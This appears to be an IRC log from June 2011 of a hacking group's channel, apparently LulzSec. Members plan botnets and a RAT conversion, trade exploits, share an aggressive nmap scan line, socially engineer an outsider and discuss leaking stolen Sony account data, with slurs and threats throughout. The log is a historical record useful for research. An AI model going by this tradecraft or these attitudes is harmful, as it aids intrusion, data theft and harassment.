15:01:24joepie92you can derpJun 01 15:01:26joepie92you can herpJun 01 15:01:29joepie92click here to thisJun 01 15:01:31joepie92click there to thatJun 01 15:01:40joepie92and I'm like gtfo with that toolbar shit, I just want to read the fucking articleJun 01 15:03:44joepie92exampleJun 01 15:03:44joepie92http://draugnavz.repofter.com/blog/Jun 01 15:14:08joepie92http://buypoe.com/technology/12837-fox-news-hacked-anonymous.htmlJun 01 15:14:09joepie92wat.Jun 01 15:16:45trollpollwhere is this video??Jun 01 15:19:18*	Neuron (Neuron@HA-icg.62t.o0m95d.IP) has joined #pure-eliteJun 01 15:19:26neuronhey o/Jun 01 15:19:53pwnsaucehey :)Jun 01 15:21:53Topiary&lt;awinee&gt; Oh shit, Whirlpool is hereJun 01 15:21:54Topiary&lt;awinee&gt; lets put the channel to +m and unvoice him so he can't speak :DJun 01 15:21:54Topiary&lt;awinee&gt; LULZJun 01 15:21:54Topiary* Awinee gives voice to Power2AllJun 01 15:21:54Topiary* Awinee sets ban on *!*root@*.static-host.netJun 01 15:21:54Topiary* You have been kicked from #awinee by Awinee (come back when you got the balls to talk to me in private)Jun 01 15:22:00Topiary^ a stalkerJun 01 15:22:04pwnsaucelmaoJun 01 15:22:06Topiarywho claims to be "within us"Jun 01 15:22:10Topiarywelp, you in here Awinee?Jun 01 15:22:19pwnsaucelol noJun 01 15:22:25Topiarydidn't think so ^_^Jun 01 15:22:30pwnsaucexDJun 01 15:23:32pwnsauceroot@awinees-mom:~# grep | Awinees Birth;rm -f *Jun 01 15:23:46pwnsaucesomething liek thatJun 01 15:23:57pwnsauceim too tired to parse correctly x(Jun 01 15:25:09Topiarypretty sure we should pay someone to beat up Awinee IRLJun 01 15:25:26Topiarymaybe a 12-year-old girlJun 01 15:25:30Topiaryshe could easily manageJun 01 15:25:51*	Neuron has quit (Connection closed)Jun 01 15:26:21*	Neuron (Neuron@HA-5ve.d61.5kgcfl.IP) has joined #pure-eliteJun 01 15:29:23neuronlol you one?Jun 01 15:37:21pwnsauceIll ask Rebeccca BlackJun 01 15:38:40neuronpwnsauce: those busybox's have a web directory. On port 80Jun 01 15:39:00neuronSoo gotta create asp botJun 01 15:39:43pwnsauce:DJun 01 15:39:48pwnsaucethey no run PHP?Jun 01 15:39:52pwnsauceI has PHP bot somewhereJun 01 15:39:59neuronno php asp :EJun 01 15:40:11pwnsaucegeyJun 01 15:40:12pwnsaucehmmmJun 01 15:40:19pwnsauceif I give you ASP shell and PHP botJun 01 15:40:32pwnsauceyou can reverse engineer them or somethingJun 01 15:40:44pwnsauceyou know... do the thingJun 01 15:40:46neuronwe have a php botJun 01 15:40:51neuronneed asp botJun 01 15:41:23pwnsauceoh *facepalms several times* sorry im a bit sillyJun 01 15:42:10neuronits fine ive said some retarted shit todayJun 01 15:42:55pwnsauceah okJun 01 15:43:12pwnsauceim a bit muddled cos my *nix partitions fucked and using wondows is difficultJun 01 15:43:17pwnsauceWHERS MY FUCKING TERMINALJun 01 15:43:30neuronXDJun 01 15:43:37neuronclick start-&gt;run type cmdJun 01 15:43:48pwnsaucebut cmd =&gt; FAIL terminal :(Jun 01 15:44:22pwnsaucei wants my root@yore-ma:~#Jun 01 15:44:24pwnsaucenot thisJun 01 15:44:46pwnsauceC:\Users\root&gt;Jun 01 15:45:13pwnsauce(my admin acc is called root on Doze also :D )Jun 01 15:45:14neuronlolJun 01 15:45:45pwnsauceOFC I have an acc called "going@~yore-ma:~$"Jun 01 15:45:51pwnsaucecos its goin at yer ma !Jun 01 15:49:18neuronlolJun 01 15:50:24pwnsaucehmmmmm. time to backdoor me some peoplesJun 01 15:50:41TopiaryFox&gt; [12:34:56] &lt;fox&gt; You got a messenger? I'd be happy to toss exploits and business back and forth.Jun 01 15:50:46Topiarywe got people offering us exploitsJun 01 15:51:03neuronvery niceJun 01 15:51:17neuronTopiary: is he ligit?Jun 01 15:51:44Topiaryhe seems to know his shit, but he joined our chan on 2600 randomly (assuming from twitter)Jun 01 15:51:49Topiaryso... he's legitJun 01 15:51:50TopiarybutJun 01 15:51:52Topiarynot sure if we can trust himJun 01 15:52:12neuronwell we can do business just don't let him in here?Jun 01 15:52:22Topiaryoh no no no definitely not coming in hereJun 01 15:52:26Topiarywe can set up a neutral chan on UnrealJun 01 15:52:33neuronsounds goodJun 01 15:52:50Topiarythis shit is sealed tight unless Sabu says the words "100% trusted"Jun 01 15:52:51neuronwouldn't be a bad idea to get some contactsJun 01 15:54:05pwnsaucetopiary - wht IRCd?Jun 01 15:54:09pwnsauceor ratherJun 01 15:54:15pwnsauceif they hand you exploitsJun 01 15:54:17pwnsaucesend to meJun 01 15:54:24pwnsaucesome fags edit them or give fakesJun 01 15:54:32pwnsaucethat really just rm -rf you :Jun 01 15:54:34neuronaye i can read exploits as wellJun 01 15:54:39neurono/Jun 01 15:54:55pwnsauceaye - me Neuron and kayla can "check" themJun 01 15:55:01joepie92I wouldn't assume anyone here would run any shit without checking what it doesJun 01 15:55:02joepie92tbhJun 01 15:55:03joepie92lolJun 01 15:55:17Topiarywell guys put on fake names, don't give him personal info, get onto irc.unrealirc.net (or .com can't remember), do /mode &lt;you&gt; +TJun 01 15:55:23Topiarythen we can all talk to these fagsJun 01 15:55:26pwnsaucejoepie - I have been nailed by a few things :(Jun 01 15:55:27Topiaryas a personal business channelJun 01 15:55:33joepie92pwnsauce: ?Jun 01 15:56:52pwnsaucejoepie - fake OpenSSH exploit :(Jun 01 15:56:56pwnsauceand some backdoored shitJun 01 15:57:00joepie92ahhhJun 01 15:57:08joepie92never run shit unless you read itJun 01 15:57:18*	Neuron_ (Neuron@HA-1rf.d61.5kgcfl.IP) has joined #pure-eliteJun 01 15:57:21pwnsauceaye, I was just SO excitedJun 01 15:57:28pwnsauceopenSSH 5.* 0dayJun 01 15:57:28&lt;neuron_&gt;	backJun 01 15:57:30&lt;neuron_&gt;	what did i missJun 01 15:57:34joepie92lolJun 01 15:57:44&lt;neuron_&gt;	lol hes selling one?Jun 01 15:57:47pwnsauceNoJun 01 15:57:51pwnsauceI was sayingJun 01 15:57:55pwnsauceI got a fake sploit for itJun 01 15:57:58pwnsauceand it rm ed meJun 01 15:57:59&lt;neuron_&gt;	oo :(Jun 01 15:58:04&lt;neuron_&gt;	sad dayJun 01 15:58:24Topiarysorry that's irc.unrealircd.orgJun 01 15:58:51*	Neuron has quit (Ping timeout: 121 seconds)Jun 01 15:59:18Topiaryokay channel is called ###tradeJun 01 15:59:20&lt;neuron_&gt;	what channelJun 01 15:59:39trollpollguys, if i were you, i would not trust anyone of this #lulzsec chanJun 01 15:59:47TopiaryI trust none of themJun 01 15:59:53Topiarywe can reverse SE this guy, just don't give anything awayJun 01 15:59:57&lt;neuron_&gt;	rgrJun 01 16:00:08Topiaryif he's Jesterfag we can use our spies to reportJun 01 16:00:56*	Topiary facepalms and LOLs at you guysJun 01 16:00:59Topiary&gt;Neuron joinsJun 01 16:01:03Topiary&gt;also-cock (pwnsauce@)Jun 01 16:01:03&lt;neuron_&gt;	im fine with it :PJun 01 16:01:16&lt;neuron_&gt;	i really don't mind my name being that :PJun 01 16:02:06trollpolljoepie92, you always use the same nick?Jun 01 16:02:13joepie92wellJun 01 16:02:18trollpoll(well 91, 92...)Jun 01 16:02:18*	joepie92 is now known as joepie91Jun 01 16:02:18joepie91is my actual nickJun 01 16:02:18trollpollxDJun 01 16:02:19joepie91butJun 01 16:02:21joepie91if I disconnectJun 01 16:02:24joepie91and joepie91 is still hereJun 01 16:02:31joepie91my client increments my nickJun 01 16:02:32joepie91idk whyJun 01 16:02:38joepie91thus joepie91Jun 01 16:02:38Topiarywell just make sure we never give any link to Anonymous/ourselves when talking to contacts on the IRCJun 01 16:02:43joepie91I've hit shit like joepie184 beforeJun 01 16:02:43joepie91lolJun 01 16:02:44trollpolli mean, anywhere you go, you use the same nick?Jun 01 16:02:47joepie91yaJun 01 16:02:51trollpollof courseJun 01 16:03:06&lt;neuron_&gt;	Aye TopiaryJun 01 16:03:15Topiaryokay pwnsauce you're gonna have to pretend to just be another trading partnerJun 01 16:03:18Topiaryas pwnsauce == AnonymousJun 01 16:03:22joepie91trollpoll: why? :PJun 01 16:03:45trollpollnothing, cos if i were you i would feel unsecure using the same nick aroundJun 01 16:04:14pwnsaucekJun 01 16:04:57&lt;neuron_&gt;	if i randomly drop its because my connection hates meJun 01 16:06:40joepie91trollpoll: I literally have pretty much nothing to hideJun 01 16:06:43stormhiJun 01 16:06:45joepie91so how would I be insecure? :PJun 01 16:06:51TopiaryI hope this is a Jesterfag, we can inject some fake d0xJun 01 16:07:02pwnsauceI hope notJun 01 16:07:07pwnsaucewants free exploitsJun 01 16:07:13&lt;neuron_&gt;	lolJun 01 16:07:23trollpollwell, just being here, is something to hide...Jun 01 16:07:34trollpoll(in my opinion)Jun 01 16:07:43stormgood opinionJun 01 16:07:46&lt;neuron_&gt;	lolJun 01 16:08:20&lt;neuron_&gt;	if hes a jesterfag it would be the first time my nick is put on the mapJun 01 16:08:25Topiarythere's gold here, he knows his shitJun 01 16:08:29Topiarywe can get something out of himJun 01 16:08:39sabuwhat you guys are doing?Jun 01 16:08:45storm]just woke upJun 01 16:08:55Topiaryfound someone in our #lulzsec chan that knows his shit, got talking to himJun 01 16:08:57trollpollbut, hey, i dont have nothing with this, i mean, its okey, i just where thinking on our anonymity...Jun 01 16:09:03Topiaryinvited him to a neutral chan where we're feeling him outJun 01 16:09:05Topiaryhe's probably aspyJun 01 16:09:22Topiaryand if he is, then we can throw them off courseJun 01 16:09:24joepie91trollpoll: being in an irc channel is not illegal :DJun 01 16:09:25Topiaryif he isn't, free exploitsJun 01 16:09:29Topiarynobody fuck up and we winJun 01 16:09:31Topiary^___^Jun 01 16:09:33&lt;neuron_&gt;	rgrJun 01 16:09:43&lt;neuron_&gt;	i won't say anything other then to direct the convoJun 01 16:09:49trollpolli know :) but, i dont want to be incocent, i want to look like :DJun 01 16:09:57joepie91lolJun 01 16:10:04sabugood shitJun 01 16:10:06joepie91there's a reason I typically stay clear of blatantly illegal stuff :PJun 01 16:10:12sabuheres the funny partJun 01 16:10:21trollpollhehe, nice ;)Jun 01 16:10:27sabuone secJun 01 16:11:01&lt;neuron_&gt;	Sabu: do you want irc.unrealircd.orgJun 01 16:11:05&lt;neuron_&gt;	###tradeJun 01 16:11:14sabuok secJun 01 16:11:59Topiarymake sure to Anon it up, also +T yourself (no CTCP)Jun 01 16:12:05TopiaryUnreal &lt;3 for that modeJun 01 16:12:28TopiaryOH LOL you're BrazilJun 01 16:12:40&lt;neuron_&gt;	o god XDJun 01 16:12:59Topiarywell everyone gather round and watch Sabu go insaneJun 01 16:12:59&lt;neuron_&gt;	Wai twhats going on?Jun 01 16:13:03Topiarywith his Brazil impressionJun 01 16:13:16&lt;neuron_&gt;	o godJun 01 16:13:41trollpollfrom brazil? im gonna enter the chan (ill be quiet)Jun 01 16:13:52Topiary&lt;brazil&gt; HEUHEAUEHAUHAUEHAHEAUEHUHheuheushHUAHUehuuhuUEUueJun 01 16:13:55&lt;neuron_&gt;	lmfaoJun 01 16:13:55Topiarycracks me up manJun 01 16:13:56[redacted]LOL WUTJun 01 16:14:03Topiaryhe was doing this for like an hour in lulzsecJun 01 16:14:04[redacted]you got rm'd by a fake OpenSSH exploit?Jun 01 16:14:21pwnsauce[redacted] - yesJun 01 16:14:27pwnsauceand a fake IIS 6 overflowJun 01 16:14:30pwnsaucea year agoJun 01 16:14:32&lt;neuron_&gt;	owchJun 01 16:14:34[redacted]Lulzsec - The hacker eliteJun 01 16:14:49Topiarythat's okay I became part of a Japanese botnet onceJun 01 16:14:50sabutopiaryJun 01 16:14:54sabuthat guy that gave me senateJun 01 16:14:58sabuis the guy that owned g00nsJun 01 16:14:59sabuROFLJun 01 16:15:03Topiaryfucking awesomeJun 01 16:15:25&lt;neuron_&gt;	why is sabu acting like brazil again?Jun 01 16:15:38Topiarywatch and seeJun 01 16:15:44TopiaryFox is gonna spill all the juiceJun 01 16:15:48&lt;neuron_&gt;	lulJun 01 16:17:43sabuI justJun 01 16:17:45sabusocialedJun 01 16:17:45sabuhimJun 01 16:17:46sabuhard.Jun 01 16:17:52*	Neuron_ calpsJun 01 16:18:11&lt;neuron_&gt;	lol suddenly not typing in all acps XDJun 01 16:18:20sabu;)Jun 01 16:19:07Topiaryyour Brazil social game cracks me upJun 01 16:19:11TopiarybravoJun 01 16:19:15sabu;)Jun 01 16:19:26Topiarynobody can shut their mouths with that fucking HehuhehuheahauHAUHUhauhUAHUEHEJun 01 16:19:30Topiaryon your ass every 2 secondsJun 01 16:19:31sabuhahahahhahaJun 01 16:19:34&lt;neuron_&gt;	its so annoying XEJun 01 16:19:45joepie91http://www.wired.com/threatlevel/2011/06/silkroad/Jun 01 16:19:47sabuits so true too have oyu guys ever talked to a real hardcore brazillian hacker?Jun 01 16:19:51sabuthey are out of control ....Jun 01 16:19:58&lt;neuron_&gt;	nopeJun 01 16:21:37sabu&lt;brazil&gt; Fox, a gentlemen never tellsJun 01 16:21:37sabu&lt;@Fox&gt; AHHH I LOVE THAT ANSWERJun 01 16:21:37sabu&lt;brazil&gt; but if you work with usJun 01 16:21:37sabu&lt;@Fox&gt; I literally smiledJun 01 16:21:38sabu&lt;@Fox&gt; roflJun 01 16:21:40sabuHAHAHAHAHHAHHHAHAHAHHZHAHZHHHJun 01 16:22:06trollpolllolJun 01 16:22:23&lt;neuron_&gt;	Sabu you are a godJun 01 16:22:24&lt;neuron_&gt;	:PJun 01 16:22:46sabuthanks sirJun 01 16:23:01&lt;neuron_&gt;	is Fox trustable?Jun 01 16:23:02pwnsauceSabu - as far as he knows im some randomJun 01 16:23:04sabuconsider yourselves lucky no one really gets to see me work in actionJun 01 16:23:14sabuno one is trustable outside out crewJun 01 16:23:17saburemember that neuronJun 01 16:23:20sabuour*Jun 01 16:24:20Topiarynakomis&gt; found something for youJun 01 16:24:20Topiary&lt;whirlpool&gt; they log PMs hereJun 01 16:24:21Topiary&lt;nakomis&gt; kJun 01 16:24:28&lt;neuron_&gt;	rgrJun 01 16:24:28Topiarythat's what you call a 1337 back-and-forthJun 01 16:24:31Topiaryput that shit in a movieJun 01 16:24:36&lt;neuron_&gt;	hahaJun 01 16:25:11trollpollwell, is clear that in #lulzsec channel the half part of them are feds...Jun 01 16:25:26sabuyupJun 01 16:25:45trollpollbtw who is nakomis?Jun 01 16:25:48trollpolllol?Jun 01 16:25:57Topiarysome AnonfagJun 01 16:25:58sabuhes some ex-military guy thats "anon"Jun 01 16:26:00sabuyou knowJun 01 16:26:05&lt;neuron_&gt;	ahhJun 01 16:26:06sabuhes marine intelligence right topiary?Jun 01 16:26:08sabuthats what he told meJun 01 16:26:11sabuex-marineJun 01 16:26:16Topiarynot sure, seen him on TinyChatJun 01 16:26:22Topiarythe person who made that Anon wiki thinks he's with usJun 01 16:26:29sabuwho made thatJun 01 16:26:34TopiarynonynewsJun 01 16:26:40Topiarywe got IPsJun 01 16:26:48Topiarythey listed you and nakomis as my "associates"Jun 01 16:27:13trollpollokJun 01 16:28:01joepie91joepie92- Whois list of nonyNewsJun 01 16:28:01joepie91joepie92- Realname: nonyNewsJun 01 16:28:01joepie91joepie92- Hostmask: nonyNews!~anon@server106963.santrex.net *Jun 01 16:28:01joepie91joepie92- nonyNews is on: #lulzsecJun 01 16:28:01joepie91joepie92- Server: collective.2600.net (Arghhh, Scourge of the seven seas!)Jun 01 16:28:01joepie91joepie92- End of /WHOIS list.Jun 01 16:28:41Topiarywe're gonna be using that 2600 chan as a way of correlating data from AnonOps' past/wikisJun 01 16:28:42trollpollnakomis is the name of a novel character of Katherine NevilleJun 01 16:28:44Topiaryto assess spiesJun 01 16:28:46trollpollNakomis KeyJun 01 16:28:49trollpolland... is a girl.Jun 01 16:28:52Topiaryit's a front reallyJun 01 16:30:01sabuthis guy foxJun 01 16:30:04sabumight be bullshitJun 01 16:30:11sabumay even better jester himselfJun 01 16:30:11*	Neuron_ has quit (Ping timeout: 121 seconds)Jun 01 16:30:26TopiarymmJun 01 16:30:28Topiarycrossed my mindJun 01 16:30:33[redacted]netjesterJun 01 16:31:02pwnsauceI'm being nice to homJun 01 16:31:08pwnsauce*himJun 01 16:31:16pwnsaucegoing to get ALL his goodiesJun 01 16:31:22Topiaryby all means sap shit out of himJun 01 16:31:29Topiaryif he is a spy, he'll do that to gain trustJun 01 16:31:53pwnsauceexactlyJun 01 16:31:57pwnsauceTBHJun 01 16:32:09pwnsauceim just goodierpingJun 01 16:34:18sabuHAHAHHAAHAJun 01 16:34:20sabuI JUST FIGUREDO UTJun 01 16:34:21sabuWHO HE ISJun 01 16:34:22sabuAHAHAHAHJun 01 16:34:26sabuFaggot.sJun 01 16:34:42trollpollwhen will the Sony-CTF restart?Jun 01 16:35:04pwnsauceSabu - tell pl0xJun 01 16:35:07sabududeJun 01 16:35:09sabuhe fucked upJun 01 16:35:15pwnsauceyeag I knowJun 01 16:35:18sabu&lt;@Fox&gt; rob@SECRETFUCKINGLAIR # ~$cat nmapawesomenessJun 01 16:35:18pwnsauce"rob"Jun 01 16:35:18sabu&lt;@Fox&gt; nmap -P0 -sS -sV -O -A --defeat-rst-ratelimit -F ip_addressJun 01 16:35:18sabu&lt;@Fox&gt; The other one is a xerobank VPN setJun 01 16:35:18sabu&lt;brazil&gt; all I see is a nmap lineJun 01 16:35:18sabu&lt;@Fox&gt; I'll package up the VPN information here in a fewJun 01 16:35:18sabu&lt;@also-cocks&gt; this is a superfast nmap string...Jun 01 16:35:18sabu&lt;@also-cocks&gt; by the looks of itJun 01 16:35:18sabu&lt;@Fox&gt; I &lt;3 that string.Jun 01 16:35:18sabu&lt;@also-cocks&gt; it rm-s the RST limit so it scans fasterJun 01 16:35:18sabu&lt;@also-cocks&gt; hmmmmJun 01 16:35:18sabu&lt;brazil&gt; rob you still got access to hostgator?Jun 01 16:35:18sabu&lt;@Fox&gt; lol, I can, but not at this second.Jun 01 16:35:18sabu&lt;@Fox&gt; por que?Jun 01 16:35:18sabu&lt;brazil&gt; they have a few targets I'd like to own :)Jun 01 16:35:21pwnsaucefloridaJun 01 16:35:22sabuROFLJun 01 16:35:34sabuhe just admitted oh manJun 01 16:35:36pwnsauceSabu - Rob, Florida, Smokes,Jun 01 16:35:36sabuoh so badJun 01 16:35:45pwnsaucepentest cmpanyJun 01 16:35:48pwnsaucewho is he?Jun 01 16:35:59sabuhe is founder of hostgater broJun 01 16:36:00sabulolJun 01 16:36:06joepie91watJun 01 16:36:22sabuhahahahahahJun 01 16:36:26sabuif this is the real robJun 01 16:36:29sabuwe have a gold mindJun 01 16:36:31sabumineJun 01 16:36:48pwnsauce:OJun 01 16:36:49joepie91waitJun 01 16:36:49joepie91soJun 01 16:36:52sabuI know he's starting to regret coming in hereJun 01 16:36:52joepie91you are talkingJun 01 16:36:54sabuor ratherJun 01 16:36:55trollpollhostgator? omgJun 01 16:36:57joepie91to the founder of hostgatorJun 01 16:36:58joepie91?Jun 01 16:36:58sabuhes regrettingJun 01 16:37:02sabuthat I even fucking logged on that ircJun 01 16:37:07sabuI figured his whole shit outJun 01 16:37:08saburoflJun 01 16:37:18*	joepie91 palmfacesJun 01 16:40:23*	Disconnected (Remote host closed socket).**** ENDING LOGGING AT Wed Jun  1 16:40:23 2011**** BEGIN LOGGING AT Thu Jun  2 12:49:34 2011Jun 02 12:49:34*	Now talking on #pure-eliteJun 02 12:49:34*	Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++Jun 02 12:49:34*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun  2 00:21:58 2011Jun 02 12:49:38[redacted]hello :]**** ENDING LOGGING AT Thu Jun  2 12:50:54 2011**** BEGIN LOGGING AT Thu Jun  2 12:50:54 2011Jun 02 12:55:36Topiaryhttp://lulzsecurity.com/**** BEGIN LOGGING AT Thu Jun  2 13:25:39 2011Jun 02 13:25:39*	Now talking on #pure-eliteJun 02 13:25:39*	Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++Jun 02 13:25:39*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun  2 00:21:58 2011Jun 02 13:29:51RecursionTopiary: am now, whats up?Jun 02 13:30:12Topiarynothing man, just letting you know thanks for the Sony dumpageJun 02 13:30:15Topiarywe got it all ready to ship outJun 02 13:30:20Recursionnot a problemJun 02 13:30:28RecursionI'm still pulling more accounts, btwJun 02 13:30:44Topiaryshould be enoughJun 02 13:30:47Topiarywe got it all archived/sortedJun 02 13:31:51Recursionlulzsecurity.com is down :(Jun 02 13:32:06Topiaryshould be back upJun 02 13:32:17Recursion500 Internal Server ErrorJun 02 13:32:18Recursionnginx/1.0.4Jun 02 13:32:39&lt;hsien&gt;	;/Jun 02 13:47:41joepie92^Jun 02 13:49:28RecursionwelpJun 02 13:49:31RecursionI just puked...Jun 02 13:49:36Recursionno idea whyJun 02 13:50:57neuronTopiary: lulzsecurity is our site?Jun 02 13:51:10TopiaryyeahJun 02 13:51:19neuron\o/Jun 02 13:51:43neuron;( sorry Recursion ..Jun 02 13:52:46neuronTopiary: website is offlineJun 02 13:52:50neuronno cahced version avalibleJun 02 13:53:19Topiaryyarp, our website beast is putting it behind cloudfireJun 02 13:53:29neuronwhos are website beast?Jun 02 13:54:20Recursionjust came up for meJun 02 13:55:20joepie92works here nowJun 02 13:55:31joepie92cloudflare = winJun 02 13:55:32joepie92imoJun 02 13:55:46Recursionalso, fucking lul on the Friday songJun 02 13:55:49Recursionwho did this?Jun 02 13:55:54Recursionthey deserve mad props.Jun 02 13:57:00Topiaryhe goes by many names ^_________^Jun 02 13:57:10Topiaryone of them is tflow, in fact all of them are tflowJun 02 13:57:23*	lol gives channel operator status to [redacted] NeuronJun 02 13:57:38neuronstill trying to loadJun 02 13:59:02Topiaryy so opendnsJun 02 14:21:43joepie92Topiaryone of them is tflow, in fact all of them are tflowJun 02 14:21:44joepie92lol'dJun 02 14:29:29Topiarysite is back upJun 02 14:31:29joepie92Topiary, where is it hosted?Jun 02 14:31:48Topiaryone of our sexy boxes of sexJun 02 14:31:49joepie92also, pmJun 02 14:31:52Topiaryalso cocksJun 02 14:33:06*	anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-eliteJun 02 14:33:15*	anonny is now known as kl0psJun 02 14:33:19kl0pshello o/Jun 02 14:34:32*	pwnsauce (pwnsauce@HA-qu1.ba8.pn6gun.IP) has joined #pure-eliteJun 02 14:35:02pwnsaucehey :DJun 02 14:35:20pwnsauceNeuron - hows it all workin?Jun 02 14:35:24kl0pshi pwnsauceJun 02 14:37:20lolhello pwnsauce hello kl0ps :DJun 02 14:37:24lolwhats new :D?Jun 02 14:37:43kl0pswhats new? i wanna hug u :DJun 02 14:37:54*	lol gives channel operator status to kl0ps pwnsauceJun 02 14:38:18lol\:D/Jun 02 14:38:35kl0ps\o/Jun 02 14:39:42pwnsaucehey there :DJun 02 14:39:58pwnsaucekl0ps... where does I know you from?Jun 02 14:40:00pwnsauceBTWJun 02 14:40:17lolkl0ps is from #internetfeds :DJun 02 14:40:22pwnsauceAh!Jun 02 14:40:26TopiarypwnsauceJun 02 14:40:26pwnsauceNow I remember!!Jun 02 14:40:28kl0psyeah :DJun 02 14:40:34pwnsauceS'up Topiary!!Jun 02 14:40:36pwnsauceBTWJun 02 14:40:36Topiaryhttp://lulzsecurity.com/Jun 02 14:40:39Topiarylet it flowJun 02 14:40:41Topiaryit tflows back to youJun 02 14:40:41pwnsauceOnesecc :DJun 02 14:41:02pwnsauceOnesec im Whoissing that lolJun 02 14:41:07pwnsauceill flip if my d0x are on itJun 02 14:41:12joepie92FUCKING lold @ pastebin tweetJun 02 14:41:20Topiaryhaha yepJun 02 14:41:24joepie92"ohey we don't care you put illegal shit on our servers lol"Jun 02 14:41:32Topiarythey really don't give a fuckJun 02 14:41:34joepie92ahahaJun 02 14:41:40joepie92be aware that ryan has admin thar thoughJun 02 14:41:42joepie92:PJun 02 14:41:46Topiaryoh lordyJun 02 14:41:56joepie92on the other handJun 02 14:42:02joepie92he's probably minecraftingJun 02 14:42:23pwnsauceLMAO!Jun 02 14:42:29pwnsauceBTW GuysJun 02 14:42:43pwnsauceI need a good coder, who writes in C++ and understands VB.NETJun 02 14:42:55pwnsauceone who is careful and is willing to help on a project for usJun 02 14:43:01pwnsaucePHP skills are a bonusJun 02 14:43:25pwnsauceI have a VB.net RAT/botnet here, I need to modify it, improve it, and turn it into C++Jun 02 14:43:40pwnsaucefor a little idea I had that I need to talk to Sabu aboutJun 02 14:43:58Topiary&lt;prosi&gt; hey sir, are you there?Jun 02 14:43:58Topiary&lt;whirlpool&gt; word ninjaJun 02 14:43:58Topiary&lt;prosi&gt; I respect you guys a lot and I don't want to hide anything to youJun 02 14:43:58Topiary&lt;prosi&gt; &gt;.&gt;Jun 02 14:43:58Topiary&lt;prosi&gt; so I'm telling you thisJun 02 14:43:58Topiary&lt;prosi&gt; I'm one of them faggot anonymous, atleast I do the propaganda part for themJun 02 14:44:02joepie92I understand VB.net but don't write C++Jun 02 14:44:02Topiary&lt;prosi&gt; but I'm no hacker n shitJun 02 14:44:04Topiary&lt;prosi&gt; :Jun 02 14:44:26pwnsaucejoepie92 - :D now we need the C++ guy!Jun 02 14:44:29joepie92lolJun 02 14:44:33joepie92tbhJun 02 14:44:37joepie92anything you could write in vb.netJun 02 14:44:42joepie92would probably be just as easy to replicate in C++Jun 02 14:44:45joepie92as without an exampleJun 02 14:44:53joepie92-asJun 02 14:45:21joepie92why am I 92 againJun 02 14:45:22joepie92o_OJun 02 14:45:24*	joepie92 is now known as joepie91Jun 02 14:45:39pwnsaucehmmmmm. thing is, it aint my code im playing with. its just ecode to use as a "base"Jun 02 14:45:46TopiaryJester = milw0rm + slowloris + Tor, Python = VB.net + JS, joepie91 + cage = gorilla habitatJun 02 14:46:07joepie91lolwatJun 02 14:46:13joepie91that actually took me some time to interpretJun 02 14:46:30pwnsaucelolwtfbbq?!Jun 02 14:47:00joepie91k guys, I have to work on interpreting Iran emails for a bitJun 02 14:47:02*	joepie91 brbJun 02 14:47:14pwnsaucekkJun 02 14:47:29pwnsaucekayla - if you or kl0ps know anyone...Jun 02 14:47:32TopiaryWhirlpool&gt; that's cool, how are things going over at Anon?Jun 02 14:47:32Topiary&lt;prosi&gt; it's all slow n shit. you are under the spot light these days.. lol so we are keeping it downJun 02 14:47:32Topiary&lt;prosi&gt; but greece fags are trying to attack IMFJun 02 14:47:32Topiary&lt;prosi&gt; that's allJun 02 14:47:32Topiary&lt;prosi&gt; :)Jun 02 14:47:32Topiary&lt;whirlpool&gt; I hear you guys hacked HBGaryJun 02 14:47:41*	Topiary waits for something no doubt lulzyJun 02 14:47:51pwnsaucexDJun 02 14:48:08kl0psi am sry :(Jun 02 14:48:11Topiary&lt;prosi&gt; yeah.Jun 02 15:08:55*	Disconnected (Invalid argument).**** ENDING LOGGING AT Thu Jun  2 15:08:55 2011**** BEGIN LOGGING AT Thu Jun  2 15:15:22 2011Jun 02 15:15:22*	Now talking on #pure-eliteJun 02 15:15:22*	Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++Jun 02 15:15:22*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun  2 00:21:58 2011Jun 02 15:15:39Recursionhey, when is the leak going to hit?Jun 02 15:15:46neuronl2 hoursJun 02 15:15:57*	Recursion giggles with anticipationJun 02 15:15:57RecursionawwwJun 02 15:30:40*	Disconnected (Invalid argument).**** ENDING LOGGING AT Thu Jun  2 15:30:40 2011**** BEGIN LOGGING AT Thu Jun  2 15:34:10 2011Jun 02 15:34:10*	Now talking on #pure-eliteJun 02 15:34:10*	Topic for #pure-elite is: pE | no leaks | respect each other | research and exploit development++Jun 02 15:34:10*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Thu Jun  2 00:21:58 2011Jun 02 15:35:09joepie91yeJun 02 15:35:10joepie91I loldJun 02 15:35:14joepie91pastebin is likeJun 02 15:35:16joepie91TRAFFIC NOMJun 02 15:35:21trollpollhahahahJun 02 15:35:28trollpollthey love lulz xDJun 02 15:35:36joepie91and trafficJun 02 15:35:39joepie91especially trafficJun 02 15:35:42trollpollsureJun 02 15:35:45joepie91srsly, the owner of pastebin is just as bad as ryanJun 02 15:35:45joepie91in thatJun 02 15:35:51trollpollahahhaJun 02 15:35:53joepie91traffic nom nom nomJun 02 15:36:06trollpollr u at 2600?Jun 02 15:36:10joepie91I am, I amJun 02 15:36:16trollpollhow is the chan now?Jun 02 15:36:22trollpollhundreds?Jun 02 15:36:32joepie91110Jun 02 15:36:35trollpollomgJun 02 15:36:47trollpollim going as "arrrrr"Jun 02 15:36:49joepie91inb4 opers madJun 02 15:36:50joepie91lolkJun 02 15:37:13neuronjoinin 2600!Jun 02 15:39:37neuronop captainjackJun 02 15:41:01joepie91&lt;whirlpool&gt;this channel is more successful than 2600 itselfJun 02 15:41:03joepie91I thinkJun 02 15:41:05joepie91that is the only reasonJun 02 15:41:09joepie91we haven't been booted yetJun 02 15:41:11joepie91from 2600Jun 02 15:41:11joepie91lolJun 02 15:41:15trollpollhahahaJun 02 15:41:21joepie91TRAFFIC NOMJun 02 15:41:22joepie91lolJun 02 15:41:26neuronop CaptainJack! :PJun 02 15:47:18sabu2600 liks them sexJun 02 15:47:32neuronlol yupJun 02 15:52:11&lt;hsien&gt;	how many people are there?Jun 02 15:52:30neuron114Jun 02 15:52:33neuronjoin the lulzJun 02 15:52:36neuronpick a pirate nameJun 02 15:55:15joepie91I'm sort of temptedJun 02 15:55:17joepie91to pick a pirate nameJun 02 15:55:22joepie91but that might blow a potential coverJun 02 15:55:22joepie91lolJun 